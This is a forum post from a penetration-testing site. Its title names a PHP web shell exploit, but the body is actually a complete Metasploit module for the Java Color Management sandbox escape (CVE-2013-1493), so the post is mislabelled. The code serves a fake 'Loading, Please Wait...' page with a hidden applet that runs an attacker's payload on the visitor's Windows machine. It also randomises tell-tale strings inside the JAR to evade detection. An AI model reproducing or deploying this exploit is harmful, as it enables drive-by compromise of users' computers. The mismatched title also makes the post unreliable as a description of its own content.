China Cyber Penetration Testing Alliance

Title: STUNSHELL PHP Web Shell Remote Code Execution

Author: admin    Time: 2013-4-4 17:31
Title: STUNSHELL PHP Web Shell Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomize the name of the entry class.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  # Serve the JAR for "*.jar" requests, the applet page for "/" and
  # redirect anything else to the resource root.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the well-known "metasploit"/"Payload" strings inside the JAR entries
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal page that embeds the applet with a random JAR name
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end




Welcome to China Cyber Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2